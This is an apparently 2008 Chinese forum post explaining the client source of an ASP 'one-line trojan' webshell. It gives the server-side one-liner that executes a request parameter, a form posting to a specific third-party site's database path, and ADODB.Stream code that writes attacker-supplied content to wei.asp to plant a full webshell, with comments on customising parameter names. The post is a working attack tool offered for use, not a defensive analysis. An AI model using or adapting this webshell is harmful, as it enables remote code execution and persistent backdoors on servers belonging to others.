|
|
一句话木马客户端源文件:
里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
//后面是注释,学c的人应该很熟悉
<form
action=http://mail.lang2008.cn/news/ebook/db/ebook.asp
//\"action=\"后面是需要修改的以asp命名的数据库的提交地址
method=post>
//这个标签的意思是建立一个表单 以post方式提交给连接
http://mail.lang2008.cn/news/ebook/db/ebook.asp处理
<textarea name=value cols=120 rows=10 width=45> //这里的value值根据服务端
<%execute request(\"value\")%>中value而设定
可以自行修改成<%execute request(\"p\")%>相应这 里的value值也必须改为p
set lP=server.createObject(\"Adodb.Stream\")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet=\"gb2312\" //字体标准
lP.writetext request(\"joeving\") //取得木马内容 参数joeving可以自己定义 但必须和下面的
name=joeving相对应
lP.SaveToFile server.mappath(\"wei.asp\"),2
//将木马内容以覆盖文件的方式写入wei.asp,2就是已覆 盖的方式,这里的wei.asp也是可以自己定义的,如定义 成1.asp,但和下面的response.redirect\"wei.asp\"中 wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect \"wei.asp\" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面 |
|
发表于 2008-6-15 09:49:34
